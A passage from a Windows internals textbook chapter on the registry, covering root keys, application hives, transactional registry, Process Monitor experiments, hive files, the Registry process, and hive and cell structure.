root keys are mapped to files on the hard disk.) Whenever a user profile is loaded (such as at logon time
or when a service process runs under the context of a specific username), HKCU is created to map to
the user’s key under HKEY_USERS (so if multiple users are logged on in the system, each user would see
a different HKCU). Table 10-4 lists some of the subkeys under HKCU.
TABLE 10-4 HKEY_CURRENT_USER subkeys

AppEvents: Sound/event associations
Console: Command window settings (for example, width, height, and colors)
Control Panel: Screen saver, desktop scheme, keyboard, and mouse settings, as well as accessibility and regional settings
Environment: Environment variable definitions
EUDC: Information on end-user defined characters
Keyboard Layout: Keyboard layout setting (for example, United States or United Kingdom)
Network: Network drive mappings and settings
Printers: Printer connection settings
Software: User-specific software preferences
Volatile Environment: Volatile environment variable definitions
HKEY_USERS
HKU contains a subkey for each loaded user profile and user class registration database on the system. It
also contains a subkey named HKU\.DEFAULT that is linked to the profile for the system (which is used by
processes running under the local system account and is described in more detail in the section “Services”
later in this chapter). This is the profile used by Winlogon, for example, so that changes to the desktop
background settings in that profile will be implemented on the logon screen. When a user logs on to a
system for the first time and her account does not depend on a roaming domain profile (that is, the user’s
profile is obtained from a central network location at the direction of a domain controller), the system
creates a profile for her account based on the profile stored in %SystemDrive%\Users\Default.
The location under which the system stores profiles is defined by the registry value HKLM\
Software\Microsoft\Windows NT\CurrentVersion\ProfileList\ProfilesDirectory, which is by default
set to %SystemDrive%\Users. The ProfileList key also stores the list of profiles present on a system.
Information for each profile resides under a subkey that has a name reflecting the security identifier
(SID) of the account to which the profile corresponds. (See Chapter 7, “Security,” of Part 1 for more
information on SIDs.) Data stored in a profile’s key includes the time of the last load of the profile in the
LocalProfileLoadTimeLow value, the binary representation of the account SID in the Sid value, and the
path to the profile’s on-disk hive (Ntuser.dat file, described later in this chapter in the “Hives” section)
in the directory given by the ProfileImagePath value. Windows shows profiles stored on a system in the
User Profiles management dialog box, shown in Figure 10-1, which you access by clicking Configure
Advanced User Profile Properties in the User Accounts Control Panel applet.
FIGURE 10-1 The User Profiles management dialog box.
EXPERIMENT: Watching profile loading and unloading
You can see a profile load into the registry and then unload by using the Runas command to
launch a process in an account that’s not currently logged on to the machine. While the new
process is running, run Regedit and note the loaded profile key under HKEY_USERS. After terminating the process, perform a refresh in Regedit by pressing the F5 key, and the profile should no
longer be present.
HKEY_CLASSES_ROOT
HKCR consists of three types of information: file extension associations, COM class registrations, and
the virtualized registry root for User Account Control (UAC). (See Chapter 7 of Part 1 for more information on UAC.) A key exists for every registered file name extension. Most keys contain a REG_SZ value
that points to another key in HKCR containing the association information for the class of files that
extension represents.
For example, HKCR\.xls points to information on Microsoft Office Excel files: its default value contains "Excel.Sheet.8", which is used to instantiate the Excel COM object. Other keys contain configuration details for all COM objects registered on the system. The UAC virtualized registry root is located in the VirtualStore key, which is not related to the other kinds of data stored in HKCR.
The data under HKEY_CLASSES_ROOT comes from two sources:
• The per-user class registration data in HKCU\SOFTWARE\Classes (mapped to the file on hard disk \Users\<username>\AppData\Local\Microsoft\Windows\Usrclass.dat)

• Systemwide class registration data in HKLM\SOFTWARE\Classes
Per-user registration data is separated from systemwide registration data so that roaming profiles can contain customizations. Nonprivileged users and applications can read systemwide data and can add new keys and values to it (which are mirrored in their per-user data), but they can modify existing keys and values only in their private data. This separation also closes a security hole: a nonprivileged user cannot change or delete keys in the systemwide version of HKEY_CLASSES_ROOT and thus cannot affect the operation of applications on the system.
HKEY_LOCAL_MACHINE
HKLM is the root key that contains all the systemwide configuration subkeys: BCD00000000, COMPONENTS
(loaded dynamically as needed), HARDWARE, SAM, SECURITY, SOFTWARE, and SYSTEM.
The HKLM\BCD00000000 subkey contains the Boot Configuration Database (BCD) information
loaded as a registry hive. This database replaces the Boot.ini file that was used before Windows Vista
and adds greater flexibility and isolation of per-installation boot configuration data. The BCD00000000
subkey is backed by the hidden BCD file, which, on UEFI systems, is located in \EFI\Microsoft\Boot. (For
more information on the BCD, see Chapter 12, "Startup and shutdown.")
Each entry in the BCD, such as a Windows installation or the command-line settings for the installation, is stored in the Objects subkey, either as an object referenced by a GUID (in the case of a boot
entry) or as a numeric subkey called an element. Most of these raw elements are documented in the
BCD reference in Microsoft Docs and define various command-line settings or boot parameters. The
value associated with each element subkey corresponds to the value for its respective command-line
flag or boot parameter.
The BCDEdit command-line utility allows you to modify the BCD using symbolic names for the ele-
ments and objects. It also provides extensive help for all the boot options available. A registry hive can
be opened remotely as well as imported from a hive file: you can modify or read the BCD of a remote
computer by using the Registry Editor. The following experiment shows you how to enable kernel de-
bugging by using the Registry Editor.
EXPERIMENT: Remote BCD editing
Although you can modify offline BCD stores by using the bcdedit /store command, in this
experiment you will enable debugging through editing the BCD store inside the registry. For the
purposes of this example, you edit the local copy of the BCD, but the point of this technique is
that it can be used on any machine’s BCD hive. Follow these steps to add the /DEBUG command-
line flag:
1. Open the Registry Editor and then navigate to the HKLM\BCD00000000 key. Expand every subkey so that the numerical identifiers of each Elements key are fully visible.
2. Identify the boot entry for your Windows installation by locating the Description with a Type value of 0x10200003, and then select the 12000004 key in the Elements tree. In the Element value of that subkey, you should find the name of your version of Windows, such as Windows 10. In recent systems, you may have more than one Windows installation or various boot applications, like the Windows Recovery Environment or the Windows Resume Application. In those cases, you may need to check the 22000002 Elements subkey, which contains the path, such as \Windows.

3. Now that you've found the correct GUID for your Windows installation, create a new subkey under the Elements subkey for that GUID and name it 0x260000a0. If this subkey already exists, simply navigate to it. The found GUID should correspond to the identifier value under the Windows Boot Loader section shown by the bcdedit /v command (you can use the /store command-line option to inspect an offline store file).

4. If you had to create the subkey, now create a binary value called Element inside it.

5. Edit the value and set it to 1. This will enable kernel-mode debugging. Here's what these changes should look like:
Note The 0x12000004 ID corresponds to BcdLibraryString_ApplicationPath, whereas the
0x22000002 ID corresponds to BcdOSLoaderString_SystemRoot. Finally, the ID you added,
0x260000a0, corresponds to BcdOSLoaderBoolean_KernelDebuggerEnabled. These values
are documented in the BCD reference in Microsoft Docs.
The HKLM\COMPONENTS subkey contains information pertinent to the Component Based Servicing (CBS) stack. This stack contains various files and resources that are part of a Windows installation image (used by the Automated Installation Kit or the OEM Preinstallation Kit) or an active installation. The CBS APIs that exist for servicing purposes use the information located in this key to identify installed components and their configuration information. This information is used whenever components are installed, updated, or removed, either individually (called units) or in groups (called packages). Because this key can get quite large, it is dynamically loaded and unloaded as needed, only while the CBS stack is servicing a request, to optimize system resources. The key is backed by the COMPONENTS hive file located in \Windows\system32\config.
The HKLM\HARDWARE subkey maintains descriptions of the system's legacy hardware and some hardware device-to-driver mappings. On a modern system, only a few peripherals, such as the keyboard, mouse, and ACPI BIOS data, are likely to be found here. The Device Manager tool lets you view registry hardware information that it obtains by simply reading values out of the HARDWARE key (although it primarily uses the HKLM\SYSTEM\CurrentControlSet\Enum tree).
HKLM\SAM holds local account and group information, such as user passwords, group definitions,
and domain associations. Windows Server systems operating as domain controllers store domain accounts and groups in Active Directory, a database that stores domainwide settings and information.
(Active Directory isn’t described in this book.) By default, the security descriptor on the SAM key is
configured so that even the administrator account doesn’t have access.
HKLM\SECURITY stores systemwide security policies and user-rights assignments. HKLM\SAM is
linked into the SECURITY subkey under HKLM\SECURITY\SAM. By default, you can’t view the contents
of HKLM\SECURITY or HKLM\SAM because the security settings of those keys allow access only by the
System account. (System accounts are discussed in greater detail later in this chapter.) You can change
the security descriptor to allow read access to administrators, or you can use PsExec to run Regedit in the
local system account if you want to peer inside. However, that glimpse won’t be very revealing because
the data is undocumented and the passwords are encrypted with one-way mapping—that is, you can’t
determine a password from its encrypted form. The SAM and SECURITY subkeys are backed by the SAM
and SECURITY hive files located in the \Windows\system32\config path of the boot partition.
HKLM\SOFTWARE is where Windows stores systemwide configuration information not needed to
boot the system. Also, third-party applications store their systemwide settings here, such as paths to
application files and directories and licensing and expiration date information.
HKLM\SYSTEM contains the systemwide configuration information needed to boot the system,
such as which device drivers to load and which services to start. The key is backed by the SYSTEM hive
file located in \Windows\system32\config. The Windows Loader uses registry services provided by the Boot Library to read and navigate the SYSTEM hive.
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG is just a link to the current hardware profile, stored under HKLM\SYSTEM\
CurrentControlSet\Hardware Profiles\Current. Hardware profiles are no longer supported in Windows,
but the key still exists to support legacy applications that might depend on its presence.
HKEY_PERFORMANCE_DATA and HKEY_PERFORMANCE_TEXT
The registry is the mechanism used to access performance counter values on Windows, whether those
are from operating system components or server applications. One of the side benefits of providing
access to the performance counters via the registry is that remote performance monitoring works “for
free” because the registry is easily accessible remotely through the normal registry APIs.
You can access the registry performance counter information directly by opening a special key named HKEY_PERFORMANCE_DATA and querying values beneath it. You won't find this key by looking in the Registry Editor; it is available only programmatically through the Windows registry functions, such as RegQueryValueEx. Performance information isn't actually stored in the registry; the registry functions redirect access under this key to live performance information obtained from performance data providers.
HKEY_PERFORMANCE_TEXT is another special key used to obtain performance counter information (usually names and descriptions). You can obtain the name of any performance counter by querying data from the special Counter registry value; the special Help value yields all the counter descriptions instead. The information returned by this key is in US English. HKEY_PERFORMANCE_NLSTEXT retrieves performance counter names and descriptions in the language in which the OS runs.
You can also access performance counter information by using the Performance Data Helper (PDH) functions available through the Performance Data Helper API (Pdh.dll). Figure 10-2 shows the components involved in accessing performance counter information.
[Figure 10-2 diagram: performance monitoring applications (custom applications and performance tools) call RegQueryValueEx or the Pdh.dll programming interfaces; Advapi32.dll's PerfLib routes requests to the registry DLL provider, system performance DLLs, performance extension DLLs, and, through the high-performance provider interface, to Windows Management Instrumentation high-performance data provider objects.]
FIGURE 10-2 Registry performance counter architecture.
As shown in Figure 10-2, this registry key is abstracted by the Performance Library (Perflib),
which is statically linked in Advapi32.dll. The Windows kernel has no knowledge about the
HKEY_PERFORMANCE_DATA registry key, which explains why it is not shown in the Registry Editor.
Application hives
Applications are normally able to read and write data from the global registry. When an application
opens a registry key, the Windows kernel performs an access check verification against the access token
of its process (or thread in case the thread is impersonating; see Chapter 7 in Part 1 for more details)
and the ACL that a particular key contains. An application is also able to load and save registry hives by
using the RegSaveKeyEx and RegLoadKeyEx APIs. In those scenarios, the application operates on data
that other processes running at a higher or same privilege level can interfere with. Furthermore, for
loading and saving hives, the application needs to enable the Backup and Restore privileges. The two
privileges are granted only to processes that run with an administrative account.
Clearly, this was a limitation for most applications that want a private repository for storing their own settings. Windows 7 introduced the concept of application hives. An application hive is a standard hive file (linked to the proper log files) that can be mounted so that it is visible only to the application that requested it. A developer can create a base hive file by using the RegSaveKeyEx API (which exports the content of a regular registry key into a hive file). The application can then mount the hive privately using the RegLoadAppKey function (specifying the REG_PROCESS_APPKEY flag prevents other applications from accessing the same hive). Internally, the function performs the following operations:
1. Creates a random GUID and assigns it to a private namespace, in the form of \Registry\A\<Random Guid>. (\Registry forms the NT kernel registry namespace, described in the "The registry namespace and operation" section later in this chapter.)

2. Converts the DOS path of the specified hive file name to NT format and calls the NtLoadKeyEx native API with the proper set of parameters.
The NtLoadKeyEx function calls the regular registry callbacks. However, when it detects that the
hive is an application hive, it uses CmLoadAppKey to load it (and its associated log files) in the private
namespace, which is not enumerable by any other application and is tied to the lifetime of the calling
process. (The hive and log files are still mapped in the “registry process,” though. The registry process
will be described in the “Startup and registry process” section later in this chapter.) The application can
use standard registry APIs to read and write its own private settings, which will be stored in the applica-
tion hive. The hive will be automatically unloaded when the application exits or when the last handle to
the key is closed.
Application hives are used by various Windows components, like the Application Compatibility telemetry agent (CompatTelRunner.exe) and the Modern Application Model. Universal Windows Platform (UWP) applications use application hives for storing information about WinRT classes that can be instantiated and are private to the application. The hive is stored in a file called ActivationStore.dat and is consumed primarily by the Activation Manager when an application is launched (or, more precisely, activated). The Background Infrastructure component of the Modern Application Model uses the hive for storing background task information. In that way, when a background task timer elapses, it knows exactly in which application library the task's code resides (as well as the activation type and threading model).
Furthermore, the modern application stack provides UWP developers with the concept of Application Data containers, which can be used for storing settings that are local to the device on which the application runs (in this case, the data container is called local) or that are automatically shared between all the user's devices on which the application is installed. Both kinds of containers are implemented in the Windows.Storage.ApplicationData.dll WinRT library, which uses an application hive, local to the application (the backing file is called settings.dat), to store the settings created by the UWP application.

Both the settings.dat and ActivationStore.dat hive files are created by the Modern Application Model's Deployment process (at app-installation time), which is covered extensively in Chapter 8, "System mechanisms" (with a general discussion of packaged applications). The Application Data containers are documented at https://docs.microsoft.com/en-us/windows/uwp/get-started/settings-learning-track.
Transactional Registry (TxR)
Thanks to the Kernel Transaction Manager (KTM; for more information see the section about the KTM
in Chapter 8), developers have access to a straightforward API that allows them to implement robust
error-recovery capabilities when performing registry operations, which can be linked with nonregistry
operations, such as file or database operations.
Three APIs support transactional modification of the registry: RegCreateKeyTransacted,
RegOpenKeyTransacted, and RegDeleteKeyTransacted. These new routines take the same parameters
as their nontransacted analogs except that a new transaction handle parameter is added. A developer
supplies this handle after calling the KTM function CreateTransaction.
After a transacted create or open operation, all subsequent registry operations, such as creating, deleting, or modifying values inside the key, will also be transacted. However, operations on the subkeys of a transacted key will not be automatically transacted, which is why the third API, RegDeleteKeyTransacted, exists: it allows the transacted deletion of subkeys, which RegDeleteKeyEx would not normally do.
Data for these transacted operations is written to log files using the common logging file system
(CLFS) services, similar to other KTM operations. Until the transaction is committed or rolled back
(both of which might happen programmatically or as a result of a power failure or system crash, de-
pending on the state of the transaction), the keys, values, and other registry modifications performed
with the transaction handle will not be visible to external applications through the nontransacted APIs.
Also, transactions are isolated from each other; modifications made inside one transaction will not be
visible from inside other transactions or outside the transaction until the transaction is committed.
Note A nontransactional writer will abort a transaction in case of conflict—for example, if
a value was created inside a transaction and later, while the transaction is still active, a non-
transactional writer tries to create a value under the same key. The nontransactional opera-
tion will succeed, and all operations in the conflicting transaction will be aborted.
The isolation level (the "I" in ACID) implemented by TxR resource managers is read-commit, which means that changes become available to other readers (transacted or not) immediately after being committed. This mechanism is important for people who are familiar with transactions in databases, where the isolation level is predictable-reads (or cursor stability, as it is called in database literature). With a predictable-reads isolation level, after you read a value inside a transaction, subsequent reads return the same data. Read-commit does not make this guarantee. One of the consequences is that registry transactions can't be used for "atomic" increment/decrement operations on a registry value.
To make permanent changes to the registry, the application that has been using the transaction
handle must call the KTM function CommitTransaction. (If the application decides to undo the changes,
such as during a failure path, it can call the RollbackTransaction API.) The changes are then visible
through the regular registry APIs as well.
Note If a transaction handle created with CreateTransaction is closed before the transaction
is committed (and there are no other handles open to that transaction), the system rolls back
that transaction.
Apart from using the CLFS support provided by the KTM, TxR also stores its own internal log files in
the %SystemRoot%\System32\Config\Txr folder on the system volume; these files have a .regtrans-ms
extension and are hidden by default. There is a global registry resource manager (RM) that services all
the hives mounted at boot time. For every hive that is mounted explicitly, an RM is created. For applications that use registry transactions, the creation of an RM is transparent because KTM ensures that all RMs taking part in the same transaction are coordinated in the two-phase commit/abort protocol. For
the global registry RM, the CLFS log files are stored, as mentioned earlier, inside System32\Config\Txr.
For other hives, they are stored alongside the hive (in the same directory). They are hidden and follow
the same naming convention, ending in .regtrans-ms. The log file names are prefixed with the name of
the hive to which they correspond.
Monitoring registry activity
Because the system and applications depend so heavily on configuration settings to guide their behavior, system and application failures can result from changing registry data or security. When the system or an application fails to read settings that it assumes it will always be able to access, it might not function properly, display error messages that hide the root cause, or even crash. It's virtually impossible to know what registry keys or values are misconfigured without understanding how the system or the application that's failing is accessing the registry. In such situations, the Process Monitor utility from Windows Sysinternals (https://docs.microsoft.com/en-us/sysinternals/) might provide the answer.
Process Monitor lets you monitor registry activity as it occurs. For each registry access, Process
Monitor shows you the process that performed the access; the time, type, and result of the access; and
the stack of the thread at the moment of the access. This information is useful for seeing how applica-
tions and the system rely on the registry, discovering where applications and the system store con-
figuration settings, and troubleshooting problems related to applications having missing registry keys
or values. Process Monitor includes advanced filtering and highlighting so that you can zoom in on
activity related to specific keys or values or to the activity of particular processes.
CHAPTER 10 Management, diagnostics, and tracing
405
Process Monitor internals
Process Monitor relies on a device driver that it extracts from its executable image at runtime before
starting it. Its first execution requires that the account running it has the Load Driver privilege as well as
the Debug privilege; subsequent executions in the same boot session require only the Debug privilege
because, once loaded, the driver remains resident.
EXPERIMENT: Viewing registry activity on an idle system
Because the registry implements the RegNotifyChangeKey function that applications can use
to request notification of registry changes without polling for them, when you launch Process
Monitor on a system that’s idle you should not see repetitive accesses to the same registry keys
or values. Any such activity identifies a poorly written application that unnecessarily negatively
affects a system’s overall performance.
Run Process Monitor, make sure that only the Show Registry Activity icon is enabled in the
toolbar (with the goal of removing noise generated by file system, network, and process or
thread events) and, after several seconds, examine the output log to see whether you can spot polling
behavior. Right-click an output line associated with polling and then choose Process Properties
from the context menu to view details about the process performing the activity.
EXPERIMENT: Using Process Monitor to locate application registry settings
In some troubleshooting scenarios, you might need to determine where in the registry the sys-
tem or an application stores particular settings. This experiment has you use Process Monitor to
discover the location of Notepad’s settings. Notepad, like most Windows applications, saves user
preferences—such as word-wrap mode, font and font size, and window position—across execu-
tions. By having Process Monitor watching when Notepad reads or writes its settings, you can
identify the registry key in which the settings are stored. Here are the steps for doing this:
1. Have Notepad save a setting you can easily search for in a Process Monitor trace. You can do this by running Notepad, setting the font to Times New Roman, and then exiting Notepad.
2. Run Process Monitor. Open the filter dialog box and the Process Name filter, and type notepad.exe as the string to match. Confirm by clicking the Add button. This step specifies that Process Monitor will log only activity by the notepad.exe process.
3. Run Notepad again, and after it has launched, stop Process Monitor's event capture by toggling Capture Events on the Process Monitor File menu.
4. Scroll to the top line of the resultant log and select it.
5. Press Ctrl+F to open a Find dialog box, and search for times new. Process Monitor should highlight a line like the one shown in the following screen that represents Notepad reading the font value from the registry. Other operations in the immediate vicinity should relate to other Notepad settings.
6. Right-click the highlighted line and click Jump To. Process Monitor starts Regedit (if it's not already running) and causes it to navigate to and select the Notepad-referenced registry value.
Registry internals
This section describes how the configuration manager—the executive subsystem that implements the
registry—organizes the registry’s on-disk files. We’ll examine how the configuration manager manages
the registry as applications and other operating system components read and change registry keys and
values. We’ll also discuss the mechanisms by which the configuration manager tries to ensure that the
registry is always in a recoverable state, even if the system crashes while the registry is being modified.
Hives
On disk, the registry isn’t simply one large file but rather a set of discrete files called hives. Each hive
contains a registry tree, which has a key that serves as the root or starting point of the tree. Subkeys
and their values reside beneath the root. You might think that the root keys displayed by the Registry
Editor correlate to the root keys in the hives, but such is not the case. Table 10-5 lists registry hives and
their on-disk file names. The path names of all hives except for user profiles are coded into the con-
figuration manager. As the configuration manager loads hives, including system profiles, it notes each
hive’s path in the values under the HKLM\SYSTEM\CurrentControlSet\Control\Hivelist subkey, remov-
ing the path if the hive is unloaded. It creates the root keys, linking these hives together to build the
registry structure you’re familiar with and that the Registry Editor displays.
TABLE 10-5 On-disk files corresponding to paths in the registry

Hive Registry Path | Hive File Path
HKEY_LOCAL_MACHINE\BCD00000000 | \EFI\Microsoft\Boot
HKEY_LOCAL_MACHINE\COMPONENTS | %SystemRoot%\System32\Config\Components
HKEY_LOCAL_MACHINE\SYSTEM | %SystemRoot%\System32\Config\System
HKEY_LOCAL_MACHINE\SAM | %SystemRoot%\System32\Config\Sam
HKEY_LOCAL_MACHINE\SECURITY | %SystemRoot%\System32\Config\Security
HKEY_LOCAL_MACHINE\SOFTWARE | %SystemRoot%\System32\Config\Software
HKEY_LOCAL_MACHINE\HARDWARE | Volatile hive
HKEY_LOCAL_MACHINE\WindowsAppLockerCache | %SystemRoot%\System32\AppLocker\AppCache.dat
HKEY_LOCAL_MACHINE\ELAM | %SystemRoot%\System32\Config\Elam
HKEY_USERS\<SID of local service account> | %SystemRoot%\ServiceProfiles\LocalService\Ntuser.dat
HKEY_USERS\<SID of network service account> | %SystemRoot%\ServiceProfiles\NetworkService\NtUser.dat
HKEY_USERS\<SID of username> | \Users\<username>\Ntuser.dat
HKEY_USERS\<SID of username>_Classes | \Users\<username>\AppData\Local\Microsoft\Windows\Usrclass.dat
HKEY_USERS\.DEFAULT | %SystemRoot%\System32\Config\Default
Virtualized HKEY_LOCAL_MACHINE\SOFTWARE | Different paths. Usually \ProgramData\Packages\<PackageFullName>\<UserSid>\SystemAppData\Helium\Cache\<RandomName>.dat for Centennial
Virtualized HKEY_CURRENT_USER | Different paths. Usually \ProgramData\Packages\<PackageFullName>\<UserSid>\SystemAppData\Helium\User.dat for Centennial
Virtualized HKEY_LOCAL_MACHINE\SOFTWARE\Classes | Different paths. Usually \ProgramData\Packages\<PackageFullName>\<UserSid>\SystemAppData\Helium\UserClasses.dat for Centennial
You’ll notice that some of the hives listed in Table 10-5 are volatile and don’t have associated files.
The system creates and manages these hives entirely in memory; the hives are therefore tempo-
rary. The system creates volatile hives every time it boots. An example of a volatile hive is the HKLM\
HARDWARE hive, which stores information about physical devices and the devices’ assigned resources.
Resource assignment and hardware detection occur every time the system boots, so not storing this
data on disk is logical. You will also notice that the last three entries in the table represent virtualized
hives. Starting from the Windows 10 Anniversary Update, the NT kernel supports the Virtualized Registry
(VReg), with the goal of providing support for Centennial packaged applications, which run in Helium
containers. Every time the user runs a Centennial application (like the modern Skype, for example), the
system mounts the needed package hives. Centennial applications and the Modern Application Model
have been extensively discussed in Chapter 8.
EXPERIMENT: Manually loading and unloading hives
Regedit has the ability to load hives that you can access through its File menu. This capability can
be useful in troubleshooting scenarios where you want to view or edit a hive from an unbootable
system or a backup medium. In this experiment, you’ll use Regedit to load a version of the
HKLM\SYSTEM hive that Windows Setup creates during the install process.
1. Hives can be loaded only underneath HKLM or HKU, so open Regedit, select HKLM, and choose Load Hive from the Regedit File menu.
2. Navigate to the %SystemRoot%\System32\Config\RegBack directory in the Load Hive dialog box, select System, and open it. Some newer systems may not have any file in the RegBack folder. In that case, you can try the same experiment by opening the ELAM hive located in the Config folder. When prompted, type Test as the name of the key under which it will load.
3. Open the newly created HKLM\Test key and explore the contents of the hive.
4. Open HKLM\SYSTEM\CurrentControlSet\Control\Hivelist and locate the entry \Registry\Machine\Test, which demonstrates how the configuration manager lists loaded hives in the Hivelist key.
5. Select HKLM\Test and then choose Unload Hive from the Regedit File menu to unload the hive.
Hive size limits
In some cases, hive sizes are limited. For example, Windows places a limit on the size of the
HKLM\SYSTEM hive. It does so because Winload reads the entire HKLM\SYSTEM hive into physical
memory near the start of the boot process when virtual memory paging is not enabled. Winload also
loads Ntoskrnl and boot device drivers into physical memory, so it must constrain the amount of physi-
cal memory assigned to HKLM\SYSTEM. (See Chapter 12 for more information on the role Winload
plays during the startup process.) On 32-bit systems, Winload allows the hive to be as large as 400 MB
or half the amount of physical memory on the system, whichever is lower. On x64 systems, the lower
bound is 2 GB.
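The sizing rule above can be sketched as a small function. This is illustrative arithmetic only, not Winload's actual code, and for x64 it returns only the 2-GB lower bound that the text states:

```python
MB = 1024 * 1024
GB = 1024 * MB

def hklm_system_size_limit(phys_mem_bytes, is_x64):
    # On 32-bit systems, Winload allows the hive to be as large as 400 MB
    # or half the amount of physical memory, whichever is lower. For x64,
    # the text gives only a lower bound of 2 GB, so that is returned here.
    if is_x64:
        return 2 * GB
    return min(400 * MB, phys_mem_bytes // 2)
```

For example, a 32-bit machine with 512 MB of RAM would cap the SYSTEM hive at 256 MB, while one with 8 GB would hit the 400-MB ceiling instead.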
Startup and the registry process
Before Windows 8.1, the NT kernel used paged pool for storing the content of every loaded hive
file. Most of the hives loaded in the system remained in memory until system shutdown (a good
example is the SOFTWARE hive, which is loaded by the Session Manager after phase 1 of System
startup is completed and can be multiple hundreds of megabytes in size). Paged pool
memory could be paged out by the balance set manager of the memory manager if it was not accessed
for a certain amount of time (see Chapter 5, "Memory management," in Part 1 for more details). This
implies that unused parts of a hive did not remain in the working set for a long time. Committed virtual
memory is backed by the page file and requires the system Commit charge to be increased, reducing
the total amount of virtual memory available for other purposes.
To overcome this problem, Windows 10 April 2018 Update (RS4) introduced support for the section-
backed registry. At phase 1 of the NT kernel initialization, the Configuration manager startup routine
initializes multiple components of the Registry: cache, worker threads, transactions, callbacks support,
and so on. It then creates the Key object type, and, before loading the needed hives, it creates the
Registry process. The Registry process is a fully-protected (same protection as the SYSTEM process:
WinSystem level), minimal process, which the configuration manager uses for performing most of the
I/Os on opened registry hives. At initialization time, the configuration manager maps the preloaded
hives in the Registry process. The preloaded hives (SYSTEM and ELAM) continue to reside in nonpaged
memory, though (which is mapped using kernel addresses). Later in the boot process, the Session
Manager loads the Software hive by invoking the NtInitializeRegistry system call.
A section object backed by the “SOFTWARE” hive file is created: the configuration manager divides
the file in 2-MB chunks and creates a reserved mapping in the Registry process’s user-mode address
space for each of them (using the NtMapViewOfSection native API. Reserved mappings are tracked by
valid VADs, but no actual pages are allocated. See Chapter 5 in Part 1 for further details). Each 2-MB
view is read-only protected. When the configuration manager wants to read some data from the hive,
it accesses the view’s pages and produces an access fault, which causes the shared pages to be brought
into memory by the memory manager. At that time, the system working set charge is increased, but
not the commit charge (the pages are backed by the hive file itself, and not by the page file).
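The 2-MB chunking described above determines how many reserved views the configuration manager needs for a given hive file. The view size comes from the text; the function itself is an illustrative sketch, not a real API:

```python
VIEW_SIZE = 2 * 1024 * 1024  # each reserved mapping covers a 2-MB chunk

def reserved_view_count(hive_file_bytes):
    # The configuration manager divides the hive file into 2-MB chunks
    # and creates one reserved, read-only view per chunk, so the number
    # of views is the ceiling of size / 2 MB.
    return -(-hive_file_bytes // VIEW_SIZE)
```

A 300-MB SOFTWARE hive would therefore need 150 reserved views, none of which consume commit charge until their pages are faulted in.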
At initialization time, the configuration manager sets a hard working set limit of 64 MB on the
Registry process. This means that in high memory-pressure scenarios, it is guaranteed that no more than
64 MB of working set is consumed by the registry. Every time an application or the system uses the
APIs to access the registry, the configuration manager attaches to the Registry process address space,
performs the needed work, and returns the results. The configuration manager doesn’t always need to
switch address spaces: when the application wants to access a registry key that is already in the cache
(a Key control block already exists), the configuration manager skips the process attach and returns the
cached data. The registry process is primarily used for doing I/O on the low-level hive file.
When the system writes or modifies registry keys and values stored in a hive, it performs a copy-
on-write operation (by first changing the memory protection of the 2 MB view to PAGE_WRITECOPY).
Writing to memory marked as copy-on-write creates new private pages and increases the system
commit charge. When a registry update is requested, the system immediately writes new entries in
the hive’s log, but the writing of the actual pages belonging to the primary hive file is deferred. Dirty
hive’s pages, as for every normal memory page, can be paged out to disk. Those pages are written to
the primary hive file when the hive is being unloaded or by the Reconciler: one of the configuration
manager’s lazy writer threads that runs by default once every hour (the time period is configurable
by setting the HKLM\SYSTEM\ CurrentControlSet\Control\Session Manager\Configuration Manager\
RegistryLazyReconcileInterval registry value).
The Reconciler and the Incremental logging are discussed in the “Incremental logging” section later
in this chapter.
410
CHAPTER 10 Management, diagnostics, and tracing
Registry symbolic links
A special type of key known as a registry symbolic link makes it possible for the configuration manager
to link keys to organize the registry. A symbolic link is a key that redirects the configuration manager to
another key. Thus, the key HKLM\SAM is a symbolic link to the key at the root of the SAM hive. Symbolic
links are created by specifying the REG_CREATE_LINK parameter to RegCreateKey or RegCreateKeyEx.
Internally, the configuration manager will create a REG_LINK value called SymbolicLinkValue, which con-
tains the path to the target key. Because this value is a REG_LINK instead of a REG_SZ, it will not be visible
with Regedit—it is, however, part of the on-disk registry hive.
EXPERIMENT: Looking at hive handles
The configuration manager opens hives by using the kernel handle table (described in Chapter 8)
so that it can access hives from any process context. Using the kernel handle table is an efficient
alternative to approaches that involve using drivers or executive components to access, from the
System process only, handles that must be protected from user processes. You can start Process
Explorer as Administrator to see the hive handles, which will be displayed as being opened in
the System process. Select the System process, and then select Handles from the Lower Pane
View menu entry on the View menu. Sort by handle type, and scroll until you see the hive files,
as shown in the following screen.
Hive structure
The configuration manager logically divides a hive into allocation units called blocks in much the same
way that a file system divides a disk into clusters. By definition, the registry block size is 4096 bytes
(4 KB). When new data expands a hive, the hive always expands in block-granular increments. The first
block of a hive is the base block.
The base block includes global information about the hive, including a signature—regf—that iden-
tifies the file as a hive, two updated sequence numbers, a time stamp that shows the last time a write
operation was initiated on the hive, information on registry repair or recovery performed by Winload,
the hive format version number, a checksum, and the hive file’s internal file name (for example,
\Device\HarddiskVolume1\WINDOWS\SYSTEM32\CONFIG\SAM). We’ll clarify the significance of the
two updated sequence numbers and time stamp when we describe how data is written to a hive file.
The hive format version number specifies the data format within the hive. The configuration man-
ager uses hive format version 1.5, which supports large values (values larger than 1 MB are supported)
and improved searching (instead of caching the first four characters of a name, a hash of the entire
name is used to reduce collisions). Furthermore, the configuration manager supports differencing hives
introduced for container support. Differencing hives uses hive format 1.6.
Windows organizes the registry data that a hive stores in containers called cells. A cell can hold a
key, a value, a security descriptor, a list of subkeys, or a list of key values. A four-byte character tag at
the beginning of a cell’s data describes the data’s type as a signature. Table 10-6 describes each cell
data type in detail. A cell’s header is a field that specifies the cell’s size as the 1’s complement (not pres-
ent in the CM_ structures). When a cell joins a hive and the hive must expand to contain the cell, the
system creates an allocation unit called a bin.
A bin is the size of the new cell rounded up to the next block or page boundary, whichever is higher.
The system considers any space between the end of the cell and the end of the bin to be free space
that it can allocate to other cells. Bins also have headers that contain a signature, hbin, and a field that
records the offset into the hive file of the bin and the bin’s size.
TABLE 10-6 Cell data types

Data Type | Structure Type | Description
Key cell | CM_KEY_NODE | A cell that contains a registry key, also called a key node. A key cell contains a signature (kn for a key, kl for a link node), the time stamp of the most recent update to the key, the cell index of the key's parent key cell, the cell index of the subkey-list cell that identifies the key's subkeys, a cell index for the key's security descriptor cell, a cell index for a string key that specifies the class name of the key, and the name of the key (for example, CurrentControlSet). It also saves cached information such as the number of subkeys under the key, as well as the size of the largest key, value name, value data, and class name of the subkeys under this key.
Value cell | CM_KEY_VALUE | A cell that contains information about a key's value. This cell includes a signature (kv), the value's type (for example, REG_DWORD or REG_BINARY), and the value's name (for example, BootExecute). A value cell also contains the cell index of the cell that contains the value's data.
